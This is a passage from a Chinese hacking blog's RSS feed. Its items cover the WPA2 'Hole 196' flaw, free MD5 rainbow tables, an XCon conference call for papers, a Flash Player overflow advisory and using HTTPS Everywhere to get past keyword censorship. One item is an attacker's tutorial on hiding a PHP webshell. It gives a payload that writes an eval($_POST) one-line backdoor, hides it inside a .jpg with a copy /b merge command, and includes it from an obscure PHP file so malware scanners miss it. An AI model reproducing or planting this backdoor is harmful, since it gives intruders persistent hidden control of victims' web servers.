1、PTK（成对瞬时密钥），每个客户端唯一的，保护单点流量。 2、GTK（组临时密钥），保护网络内发送至多个客户端的数据。
PTKs可以检测地址欺骗和数据伪造。&#8221;GTKs无此属性&#8221;。 便是这几个字暴露了漏洞。因为客户端拥有GTK协议以接收广播通信，所以用户可以利用GTK生成其设备自己的广播数据包，进而，客户端会发送自己私人密匙 信息响应这MAC地址。 研究人员使用了网上免费开源软件&#8221;MadWiFi&#8221;并修改了10行代码，和现成的随便什么无线网卡，伪造了接入点的MAC地址，当作网关向外传送信号。接 收到广播信息的客户端将其视为网关并以PTK回应，而此PTK本应是私密的，此时则能被内部人破译。进而可以控制流量、发起拒绝服务攻击、或者嗅探。
AirTight公司表示，虽然此漏洞的利用仅限于授权用户，但多年的安全研究表明内部安全的缺口正在成为企业亏损的最大源头-机密数据的窃取与贩卖 -无论是哪个极度不爽的员工，或是间谍。尤其是这个网络高度发达的时代。 而对于漏洞196，除了协议升级给这漏洞补一下，不然没辙。
]]></description>
			<content:encoded><![CDATA[<p>WPA2协议爆出0day漏洞，&#8221;漏洞196&#8243;意味着内部恶意用户可以伪造数据包危<img src="http://www.lzpnb.com/wp-content/uploads/2010/07/zrclip_001n284b2188.png" style="DISPLAY: inline; FLOAT: right" height="132" width="142"/>害无线局域网。无线安全研究者称发现了迄今最强的加密验证标准 -WPA2安全协议的漏洞，该漏洞可能会被网络内部的恶意用户利用。来自AirTight Network无线网络安全公司的研究人员将其命名为&#8221;漏洞196&#8243;。这绰号来源则是IEEE 802.11标准（2007版）埋下漏洞的页码。</p>
<p>该公司表示，漏洞196会导致一个类似于中间人的攻击方式：凭借内部授权用户和开源软件，可以在半空中解密其他用户私密数据、注入恶意流量至 网络、危害其它授权设备。 发现该漏洞的研究人员称，由AES衍生出来的WPA2既没有被破解，也没有通过暴力手段而暴露此漏洞。标准里的条款，允许所有客户端使用一个普通共享密匙 接收来自接入点的广播信号，当授权过的用户使用共享密匙传回利用组共享密匙加密的伪造数据包，漏洞便出现了。</p>
<p>根据IEEE 802.11标准第196页，WPA2使用两种密匙：</p>
<p>1、PTK（成对瞬时密钥），每个客户端唯一的，保护单点流量。 <br/>2、GTK（组临时密钥），保护网络内发送至多个客户端的数据。</p>
<p>PTKs可以检测地址欺骗和数据伪造。&#8221;GTKs无此属性&#8221;。 便是这几个字暴露了漏洞。因为客户端拥有GTK协议以接收广播通信，所以用户可以利用GTK生成其设备自己的广播数据包，进而，客户端会发送自己私人密匙 信息响应这MAC地址。 研究人员使用了网上免费开源软件&#8221;MadWiFi&#8221;并修改了10行代码，和现成的随便什么无线网卡，伪造了接入点的MAC地址，当作网关向外传送信号。接 收到广播信息的客户端将其视为网关并以PTK回应，而此PTK本应是私密的，此时则能被内部人破译。进而可以控制流量、发起拒绝服务攻击、或者嗅探。</p>
<p>AirTight公司表示，虽然此漏洞的利用仅限于授权用户，但多年的安全研究表明内部安全的缺口正在成为企业亏损的最大源头-机密数据的窃取与贩卖 -无论是哪个极度不爽的员工，或是间谍。尤其是这个网络高度发达的时代。 而对于漏洞196，除了协议升级给这漏洞补一下，不然没辙。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.lzpnb.com/archives/1149/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>隐藏PHP后门的方法</title>
		<link>http://www.lzpnb.com/archives/1132</link>
		<comments>http://www.lzpnb.com/archives/1132#comments</comments>
		<pubDate>Tue, 20 Jul 2010 15:22:42 +0000</pubDate>
		<dc:creator>大智若鲁</dc:creator>
				<category><![CDATA[黑客那点事]]></category>

		<guid isPermaLink="false">http://www.lzpnb.com/archives/1132</guid>
		<description><![CDATA[前几天nginx和IIS7都爆解析漏洞，搞了几个shell都 丢了，于是想寻找一个超级隐蔽的后门方法。无意中发现include这个函数可以把任意文件解析为php执行.网上去 搜索include函数漏洞,得到的结果很少.绝大多数是关于文件包含漏洞，比如用变量作为包含对像，这只是针对程序，而非针对php下 include()这个函数.关于说这个函数把任意文件解析为php的文章我还没见过,所以暂且称为原创.有找到的联系我一下.呵呵，要 是真没有..这漏洞就是我发现的了，嘎嘎.
include()函数这个漏洞一直存在,而且一直没有补丁，因为利用的人很少.具体漏洞内容 就是它可以用来把任意文件解析为php.比如include(&#8220;linuxso.txt&#8221;) include(&#8220;linuxso.jpg&#8221;); 之类的，全部当作php来执行.因为他是php函数库的问题，所以就跟web服务器和系统无 关了，理论上apache,IIS,nginx或其它web服务器，都是可以的。我只试了apache和nginx，测试 成功.测试方法比较简单，这里就不多说。直接来说这个漏洞有什么用，目前我是用来拿到web shell之后制造超级隐蔽的web后门，其它作用大家自由发挥哈.实验开始.
1，制作一张包含特殊代码的jpg图片. 因为市面上扫描网站木马的程序，都不扫描图片格式的文件,只搜索.php之类的危险后缀.当然.jpg当然是给管理员的感觉是没有 任何隐患滴.新建议一个文件 linuxso.txt 内容如下:
&#60;?fputs(fopen(&#8220;linuxso.php&#8221;,&#8221;w&#8221;),&#8221;&#60;?eval(\$_POST[linuxso]);?&#62;&#8221;)?&#62; //作用是在当前目录，打开一个linuxso.php 写入一句话 重命名为 linuxso.jpg
2， 找个图片目录上传jpg.路径记下来.
找一个深目录内又几乎用不到的php文件,比如class.archive_read.php,添 加一句话 include(&#8220;../../xxx/linuxso.jpg&#8221;); //搞清楚相对路径哦.
3,访问 http://www.xxx.com/class/class.archive_read.php,即在class.archive_read.php 同目录下生成一句话木马 linuxso.php 密码linuxso
连接一句话.上传大马.玩完了之后，记得删掉小马.这样任意他找什 么扫网马的工具.. 也查不到咱的马.嘎嘎，除非…看过这篇文章的管理员.
如果上传假图片怕被发现的话，还 可以用 copy命令，拿一张正常的图片和linux.txt 合成到一起.完成之后，图片可以正常预览.
命令如下 copy 1.jpg/b+1.txt/b 3.jpg/b 因为这样include函数包含之后，图片会正常显示，所以那句include一定要加到一个几乎用不到的php文件里.
来源：http://laoxiege.blog.sohu.com/153960857.html
]]></description>
			<content:encoded><![CDATA[<p>前几天nginx和IIS7都爆解析漏洞，搞了几个shell都 丢了，于是想寻找一个超级隐蔽<img src="http://www.lzpnb.com/wp-content/uploads/2010/07/zrclip_001n7f2047a.png" style="DISPLAY: inline; FLOAT: right" height="127" width="127"/>的后门方法。无意中发现include这个函数可以把任意文件解析为php执行.网上去 搜索include函数漏洞,得到的结果很少.绝大多数是关于文件包含漏洞，比如用变量作为包含对像，这只是针对程序，而非针对php下 include()这个函数.关于说这个函数把任意文件解析为php的文章我还没见过,所以暂且称为原创.有找到的联系我一下.呵呵，要 是真没有..这漏洞就是我发现的了，嘎嘎.</p>
<p>include()函数这个漏洞一直存在,而且一直没有补丁，因为利用的人很少.具体漏洞内容 就是它可以用来把任意文件解析为php.比如include(&#8220;linuxso.txt&#8221;) include(&#8220;linuxso.jpg&#8221;); 之类的，全部当作php来执行.因为他是php函数库的问题，所以就跟web服务器和系统无 关了，理论上apache,IIS,nginx或其它web服务器，都是可以的。我只试了apache和nginx，测试 成功.测试方法比较简单，这里就不多说。直接来说这个漏洞有什么用，目前我是用来拿到web shell之后制造超级隐蔽的web后门，其它作用大家自由发挥哈.实验开始.</p>
<p>1，制作一张包含特殊代码的jpg图片. 因为市面上扫描网站木马的程序，都不扫描图片格式的文件,只搜索.php之类的危险后缀.当然.jpg当然是给管理员的感觉是没有 任何隐患滴.新建议一个文件 linuxso.txt 内容如下:</p>
<p>&lt;?fputs(fopen(&#8220;linuxso.php&#8221;,&#8221;w&#8221;),&#8221;&lt;?eval(\$_POST[linuxso]);?&gt;&#8221;)?&gt; //作用是在当前目录，打开一个linuxso.php 写入一句话 <br/>重命名为 linuxso.jpg</p>
<p>2， 找个图片目录上传jpg.路径记下来.</p>
<p>找一个深目录内又几乎用不到的php文件,比如class.archive_read.php,添 加一句话 include(&#8220;../../xxx/linuxso.jpg&#8221;); //搞清楚相对路径哦.</p>
<p>3,访问 http://www.xxx.com/class/class.archive_read.php,即在class.archive_read.php 同目录下生成一句话木马 linuxso.php 密码linuxso</p>
<p>连接一句话.上传大马.玩完了之后，记得删掉小马.这样任意他找什 么扫网马的工具.. 也查不到咱的马.嘎嘎，除非…看过这篇文章的管理员.</p>
<p>如果上传假图片怕被发现的话，还 可以用 copy命令，拿一张正常的图片和linux.txt 合成到一起.完成之后，图片可以正常预览.</p>
<p>命令如下 copy 1.jpg/b+1.txt/b 3.jpg/b 因为这样include函数包含之后，图片会正常显示，所以那句include一定要加到一个几乎用不到的php文件里.</p>
<p>来源：http://laoxiege.blog.sohu.com/153960857.html</p>
]]></content:encoded>
			<wfw:commentRss>http://www.lzpnb.com/archives/1132/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>免费彩虹表下载</title>
		<link>http://www.lzpnb.com/archives/1096</link>
		<comments>http://www.lzpnb.com/archives/1096#comments</comments>
		<pubDate>Mon, 05 Jul 2010 05:50:57 +0000</pubDate>
		<dc:creator>大智若鲁</dc:creator>
				<category><![CDATA[黑客那点事]]></category>

		<guid isPermaLink="false">http://www.lzpnb.com/archives/1096</guid>
		<description><![CDATA[一个国外的彩虹表网站，里面有几种免费的彩虹表下载。
下面是翻译介绍：
该表是在自定义的格式，以节省磁盘空间（ 50 ％！ ） 。为了让他们使用，使用rcracki （ rcrack改进），它可以从我们的下载页面下载
如果你想使用原来的rainbowcrack表比rcracki其他程序，那么你可以转换表使用rti2rto也可以在我们的下载页面上找到
当下载以下表格，请考虑捐赠一些钱，以保持网站运行。 其他网站，如rainbowtables.net ，收费单彩虹tableset美国数百$，他们甚至不接近的速度表你可以找到这个免费网站。 这些表格可在这里需要更多的CPU功率的10 倍，并产生高度优化，以提供最快/最压缩的彩虹表可在互联网上你。 

百分之99的成功率，看起来不错。
网址：http://www.freerainbowtables.com/en/tables/md5/

]]></description>
			<content:encoded><![CDATA[<p>一个国外的彩虹表网站，里面有几种免费的彩虹表下载。</p>
<p>下面是翻译介绍：</p>
<p xmlns="">该表是在自定义的格式，以节省磁盘空间（ 50 ％！ ） 。为了让他们使用，使用rcracki （ rcrack改进），它可以从我们的下载页面下载</p>
<p xmlns="">如果你想使用原来的rainbowcrack表比rcracki其他程序，那么你可以转换表使用rti2rto也可以在我们的下载页面上找到</p>
<p xmlns="">当下载以下表格，请考虑捐赠一些钱，以保持网站运行。 <br/>其他网站，如rainbowtables.net ，收费单彩虹tableset美国数百$，他们甚至不接近的速度表你可以找到这个免费网站。 <br/><span style="TEXT-DECORATION: underline">这些表格可在这里需要更多的CPU功率的10 倍，并产生高度优化，以提供最快/最压缩的彩虹表可在互联网上你。</span> <br/></p>
<p xmlns=""><img src="http://www.lzpnb.com/wp-content/uploads/2010/07/zrclip_012p33f6c037.png" height="179" width="558"/></p>
<p xmlns="">百分之99的成功率，看起来不错。</p>
<blockquote><p xmlns="">网址：<a href="http://www.freerainbowtables.com/en/tables/md5/">http://www.freerainbowtables.com/en/tables/md5/</a></p>
</blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.lzpnb.com/archives/1096/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>XCon2010 安全焦点技术峰会</title>
		<link>http://www.lzpnb.com/archives/1078</link>
		<comments>http://www.lzpnb.com/archives/1078#comments</comments>
		<pubDate>Sun, 04 Jul 2010 23:57:54 +0000</pubDate>
		<dc:creator>大智若鲁</dc:creator>
				<category><![CDATA[黑客那点事]]></category>

		<guid isPermaLink="false">http://www.lzpnb.com/archives/1078</guid>
		<description><![CDATA[ XCon 秉承一贯的严谨求实作风竭诚欢迎热爱信息安全技术的人员积极投稿，参加会议，共享精彩盛会。 参加会议对象: 任何热爱信息安全的人士，包括如信息安全专家，信息安全爱好者， 网络 管理工程师，网络安全顾问， CIO，黑客技术发烧友等。 会议时间：2010年8月4~5日 会议地点: 北京歌华开元大酒店 ( http://www.kaiyuanhotels.com/Hotel/Default.aspx?City=PEK&#38;HotelCode=KYBJGH ) 征文范围 (不限于所列方向): &#8212;新领域安全 - Vista 安全 / Windows &#38; 安全 - Web 2.0安全技术 - 3G/4G网络，TD-SCDMA网络安 - 移动手持设备安全 Symbian / IPhone / Android / Windows Mobile 安全 - 银行金融安全 - 企业信息系统安全 - 虚拟化技术 - 最新漏洞挖掘技术 &#8212; 应用安全 - Web 应用程序弱点研究 - 应用程序反向工程和相关自动工具 [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.lzpnb.com/wp-content/uploads/2010/07/zrclip_001p8eccccf.png" height="84" width="426"/> <br/><br/>XCon 秉承一贯的严谨求实作风竭诚欢迎热爱信息安全技术的人员积极投稿，参加会议，共享精彩盛会。 <br/><br/>参加会议对象: <br/>任何热爱信息安全的人士，包括如信息安全专家，信息安全爱好者， 网络 <br/>管理工程师，网络安全顾问， CIO，黑客技术发烧友等。 <br/>会议时间：<strong>2010年8月4~5日</strong> <br/>会议地点: 北京歌华开元大酒店 ( <a href="http://www.kaiyuanhotels.com/Hotel/Default.aspx?City=PEK" target="_blank" rel="external">http://www.kaiyuanhotels.com/Hotel/Default.aspx?City=PEK</a>&amp;HotelCode=KYBJGH ) <br/><br/>征文范围 (不限于所列方向): <br/>&#8212;新领域安全 <br/>- Vista 安全 / Windows &amp; 安全 <br/>- Web 2.0安全技术 <br/>- 3G/4G网络，TD-SCDMA网络安 <br/>- 移动手持设备安全 Symbian / IPhone / Android / Windows Mobile 安全 <br/>- 银行金融安全 <br/>- 企业信息系统安全 <br/>- 虚拟化技术 <br/>- 最新漏洞挖掘技术 <br/><br/>&#8212; 应用安全 <br/>- Web 应用程序弱点研究 <br/>- 应用程序反向工程和相关自动工具 <br/>- 数据库安全和攻击 <br/>- 协议安全利用 <br/>- 高级木马、蠕虫、后门技术 <br/>- 加密和破解技术 <br/>- 路由器设备安全 <br/><br/>&#8212; 入侵检测/取证分析 <br/>- 文件系统分析和恢复 <br/>- 实时结构数据恢复 <br/>- 反向工程 (恶意代码分析技术，弱点研究) <br/>- 入侵检测和反检测技术 <br/>- 流量分析 <br/><br/>&#8212; 无线和VoIP 安全 <br/>- 802.11x, CDPD, Bluetooth, WAP/TD-SCDMA, GSM, SMS <br/>- PDA 和移动电话协议分析 <br/>- Palm, Pocket Pc安全 <br/>- Wireless 网关 <br/>- VoIP 安全和弱点分析 <br/>- WLANs 加固、弱点分析 <br/><br/>&#8212;P2P 技术 <br/>- 即时通信工具（QQ，MSN, Skype, ICQ 等） <br/>- P2P 应用（BT，Emule，迅雷等） <br/><br/>征文提交事宜： <br/><br/>提交的征文必须包含如下信息: <br/>1) 对要作演讲的题材进行简单的描述及说明之前是否发布，发布的范围。 <br/>2) 对演讲者自身和工作经历描述。 <br/>3) 演讲者联系信息：全名，别名，国籍，网络昵称，e-mail, 电话，传真， <br/>目前工作地点和相关公司，任何即时聊天的方式(QQ，MSN, ICQ, YM, AIM 或者其他). <br/>4) 演讲过程中所需细节: <br/>- 演讲需要多长时间 <br/>- 是否发布新的工具 <br/>- 是否发布新漏洞 <br/>- 是否需要发布新的Exploit 代码 <br/>5) 所有征文必须包含PPT(演讲使用)和WORD(细节描述)，可以以MS <br/>Office , OpenOffice 格式提交。 <br/><br/>所有征文通过cfp@huayongxingan.com提交，供 XCon组织者筛选，征文投稿最后截 <br/>止日期定于2010年7月1日，最后确认是否收录时间为2010年7月10日，投 <br/>稿自收到之日起5个工作日内，将给出准确的答复，无论您的议题是否被收 <br/>录，我们都将会通过您留下的联系方式告知您。 <br/><br/>征文相关重要日期: <br/>* 最后提交日期 &#8211; 2010年7月1日 <br/>*最后确认通知 &#8211; 2010年7月10日 <br/><br/>演讲者待遇: <br/>如果您的稿件被我们XCon收录，意味着您将在XCon会议上单独发表演讲， <br/>XCon 将会提供演讲者包含 <br/>- 往返程经济舱飞机票，限一人(外宾旅费封顶1200USD) <br/>- 2 天会议期间的酒店住宿费用 <br/>- 2 天会议期间的早餐、中餐、及晚餐 <br/>- 被邀请参加庆祝酒会 <br/>- 并且我们将会组织演讲者在会后的一天游览中国北京的一些名胜古迹，品尝 <br/>中国的风味特色食品。 <br/>- 可参与抽奖活动 <br/>注： <br/>- 演讲者必须提供相关票据或凭证。 <br/>- 所有相关会议解释权归XCon会议组织者所有。 <br/><br/>关于会议更多信息、细节及咨询，可以联系至信给如下信箱:xcon@xfocus.org，xcon@huayongxingan.com <br/>或专门的XCon2010会议组织者MSN: xfocusxcon@hotmail.com，电话：086-010-62029792 <br/><br/>申请参会: <br/><br/>您可以通过XCon网站(<a href="http://xcon.xfocus.net/" target="_blank" rel="external">http://xcon.xfocus.net</a>) 注册或直接联系我们组织者(联系方式见上)申请参 <br/>加会议，我们将给根据预定申请时间的早晚提供不同的折扣。参会者食宿自理，XCon将为参会者预定酒店 <br/>等服务。 <br/><br/>其他信息： <br/><br/>你可以浏览<a href="http://xcon.xfocus.org/" target="_blank" rel="external">http://xcon.xfocus.org/</a>查看演讲者信息、会议安排、XCon <br/>之前会议的相关文档和信息，任何有关XCon的会议信息，将在XCon和XFocus <br/>站点发布，请大家密切关注。 <br/><br/>非常感谢您对XCon 的支持！</p>
]]></content:encoded>
			<wfw:commentRss>http://www.lzpnb.com/archives/1078/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Adobe Flash Player 溢出漏洞</title>
		<link>http://www.lzpnb.com/archives/1051</link>
		<comments>http://www.lzpnb.com/archives/1051#comments</comments>
		<pubDate>Mon, 28 Jun 2010 20:37:52 +0000</pubDate>
		<dc:creator>大智若鲁</dc:creator>
				<category><![CDATA[黑客那点事]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.lzpnb.com/archives/1051</guid>
		<description><![CDATA[Adobe Flash Player 溢出漏洞
漏洞发布时间:2010-06-10 影响版本: Adobe Flash Player 9.x Adobe Flash Player 10.x 漏洞描述: Flash Player是一款非常流行的FLASH播放器。Flash Player在解析Adobe的ActionScript Virtual Machine 2 bytecode中的opcode时存在整数溢出漏洞。这个opcode的运算符用作了到结构的偏移，如果设置为恶意的值就可能执行受控的数据。结构中包含有之后会被调用的函数指针，如果攻击者将受控数据修改为指向无效的偏移，这个函数指针就可能设置为指向恶意的代码，导致以运行浏览器用户的权限执行任意代码。
此外AVM bytecode验证符中也存在整数溢出漏洞。具体来讲，newFrameState方式在计算栈帧的大小时错误的信任了从bytecode所获得的 max_scope和max_stack变量。通过伪造特定的值，就可以溢出表示帧大小的整数，导致以运行浏览器用户的权限执行任意代码。 &#60;*参考 http://secunia.com/advisories/40026/ http://www.adobe.com/support/security/bulletins/apsb10-14.html http://marc.info/?l=bugtraq&#38;m=127748704309260&#38;w=2 http://marc.info/?l=bugtraq&#38;m=127748736209747&#38;w=2 http://www.us-cert.gov/cas/techalerts/TA10-162A.html *&#62;
]]></description>
			<content:encoded><![CDATA[<p><strong>Adobe Flash Player 溢出漏洞<img src="http://www.lzpnb.com/wp-content/uploads/2010/06/zrclip_005n5bf966c9.png" style="DISPLAY: inline; FLOAT: right" height="125" width="124"/></strong></p>
<p><strong>漏洞发布时间:2010-06-10 <br/><br/>影响版本:</strong> <br/>Adobe Flash Player 9.x <br/>Adobe Flash Player 10.x <br/><br/><strong>漏洞描述: <br/></strong>Flash Player是一款非常流行的FLASH播放器。Flash Player在解析Adobe的ActionScript Virtual Machine 2 bytecode中的opcode时存在整数溢出漏洞。这个opcode的运算符用作了到结构的偏移，如果设置为恶意的值就可能执行受控的数据。结构中包含有之后会被调用的函数指针，如果攻击者将受控数据修改为指向无效的偏移，这个函数指针就可能设置为指向恶意的代码，导致以运行浏览器用户的权限执行任意代码。</p>
<p>此外AVM bytecode验证符中也存在整数溢出漏洞。具体来讲，newFrameState方式在计算栈帧的大小时错误的信任了从bytecode所获得的 max_scope和max_stack变量。通过伪造特定的值，就可以溢出表示帧大小的整数，导致以运行浏览器用户的权限执行任意代码。 <br/>&lt;*参考 <br/><a href="http://secunia.com/advisories/40026/">http://secunia.com/advisories/40026/</a> <br/><a href="http://www.adobe.com/support/security/bulletins/apsb10-14.html">http://www.adobe.com/support/security/bulletins/apsb10-14.html</a> <br/><a href="http://marc.info/?l=bugtraq&amp;m=127748704309260&amp;w=2">http://marc.info/?l=bugtraq&amp;m=127748704309260&amp;w=2</a> <br/><a href="http://marc.info/?l=bugtraq&amp;m=127748736209747&amp;w=2">http://marc.info/?l=bugtraq&amp;m=127748736209747&amp;w=2</a> <br/><a href="http://www.us-cert.gov/cas/techalerts/TA10-162A.html">http://www.us-cert.gov/cas/techalerts/TA10-162A.html</a> <br/>*&gt;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.lzpnb.com/archives/1051/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>firefox下轻松防止敏感词过滤</title>
		<link>http://www.lzpnb.com/archives/1015</link>
		<comments>http://www.lzpnb.com/archives/1015#comments</comments>
		<pubDate>Fri, 25 Jun 2010 09:40:04 +0000</pubDate>
		<dc:creator>大智若鲁</dc:creator>
				<category><![CDATA[黑客那点事]]></category>
		<category><![CDATA[iphone]]></category>

		<guid isPermaLink="false">http://www.lzpnb.com/archives/1015</guid>
		<description><![CDATA[
如果你浏览一个国外的网站，如果页面中含有敏感词汇，那么就会出现&#8221;链接被重置&#8221;的错误，而且这个网站的域名会在大约5分钟内无法访问。这就是我朝某墙的河蟹功能之一。解决这种办法，我们除了使用加密代理（如ssh）或vpn外，还有一种更简单的方法。
我们一般看到的网站网址开头大多都是「HTTP」，而当出现「HTTPS」的网址开头时，代表你正在和这个网站之间进行着「加密连接」，这时候你与网站间的通讯数据将难以被第三方所破解或截取。而「HTTPS Everywhere Beta」这款Firefox插件，正是提供了强制用HTTPS加密方式浏览各大重点网站的功能。
例如本文开头图片，就是在HTTPS加密连线状态下使用Facebook的情形，从Firefox的页面资讯提示中可以看到「你与此网站的连线已加密，可防止他人窃取资讯」，而你也会发现右方广告栏位与右下方聊天室无法显示。

要使用HTTPS加密，必须要网站支持这样的功能，但是很多网站虽然支持，却在预设情况下仍使用正常的HTTP连线方式，一方面是因为可能没有立即的加密需求（例如不是金融电子交易网站）；另外一方面是使用加密连线确实会让浏览速度变得慢一点，因为要处理资讯解码的过程。
而如果你为了隐私安全、通讯保密，或者想要规避第三方对你通讯数据的检查甚至拦截（例如国内的某墙），于是你需要「主动」、「强制」开启HTTPS浏览某些重点网站的话。那么由「EFF」与「TOR」合作开发的这款Firefox扩充套件：「HTTPS Everywhere 」，就可以帮上你的忙。
安装此插件后，在设定里可以看到目前所支支持的几大重点网站，其中我们比较熟悉的有Facebook、Google Search、Google相关服务（例如Google Docs）、Mozilla相关网站、Twitter、Wikipedia、PayPal等等，勾选后按下确定，重新开启 Firefox。这样一来进入上述网站时，就会自动强制使用HTTPS加密连接。
使用这个插件之后，用https浏览的网站就不会被某墙进行关键字过滤了。但如果网站已被屏蔽了IP，那本文的方法无效。
]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.lzpnb.com/wp-content/uploads/2010/06/zrclip_003n1d71b1a4.png" style="TEXT-ALIGN: center; DISPLAY: block; MARGIN-LEFT: auto; MARGIN-RIGHT: auto" height="375" width="500"/></p>
<p>如果你浏览一个国外的网站，如果页面中含有敏感词汇，那么就会出现&#8221;链接被重置&#8221;的错误，而且这个网站的域名会在大约5分钟内无法访问。这就是我朝某墙的河蟹功能之一。解决这种办法，我们除了使用加密代理（如ssh）或vpn外，还有一种更简单的方法。</p>
<p>我们一般看到的网站网址开头大多都是「HTTP」，<strong>而当出现「</strong><a href="http://zh.wikipedia.org/zh-tw/HTTPS" target="_blank"><strong>HTTPS</strong></a><strong>」的网址开头时，代表你正在和这个网站之间进行着「<span style="COLOR: #ff0000">加密连接</span>」，</strong>这时候你与网站间的通讯数据将难以被第三方所破解或截取。<strong>而「</strong><a href="https://www.eff.org/https-everywhere" target="_blank"><strong>HTTPS Everywhere Beta</strong></a><strong>」这款Firefox插件，正是提供了<span style="COLOR: #ff0000">强制用HTTPS加密方式</span>浏览各大重点网站的功能。</strong></p>
<blockquote><p>例如本文开头图片，就是在HTTPS加密连线状态下使用Facebook的情形，从Firefox的页面资讯提示中可以看到「你与此网站的连线已加密，可防止他人窃取资讯」，而你也会发现右方广告栏位与右下方聊天室无法显示。</p>
</blockquote>
<p>要使用HTTPS加密，必须要网站支持这样的功能，<strong>但是很多网站虽然支持，却在预设情况下仍使用正常的HTTP连线方式</strong>，一方面是因为可能没有立即的加密需求（例如不是金融电子交易网站）；另外一方面是使用加密连线确实会让浏览速度变得慢一点，因为要处理资讯解码的过程。</p>
<p>而如果你为了隐私安全、通讯保密，或者想要规避第三方对你通讯数据的检查甚至拦截（例如国内的某墙），<strong>于是你需要<span style="COLOR: #ff0000">「主动」、「强制」</span>开启HTTPS浏览某些重点网站的话</strong>。那么由「EFF」与「TOR」合作开发的这款Firefox扩充套件：「<strong><a href="https://www.eff.org/https-everywhere" target="_blank">HTTPS Everywhere</a></strong> 」，就可以帮上你的忙。</p>
<p>安装此插件后，在设定里可以看到目前所支支持的几大重点网站，其中我们比较熟悉的有<strong>Facebook、Google Search、Google相关服务（例如Google Docs）、Mozilla相关网站、Twitter、Wikipedia、PayPal</strong>等等，勾选后按下确定，重新开启 Firefox。这样一来进入上述网站时，就会自动强制使用HTTPS加密连接。</p>
<p>使用这个插件之后，用https浏览的网站就不会被某墙进行关键字过滤了。但如果网站已被屏蔽了IP，那本文的方法无效。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.lzpnb.com/archives/1015/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
	</channel>
</rss>
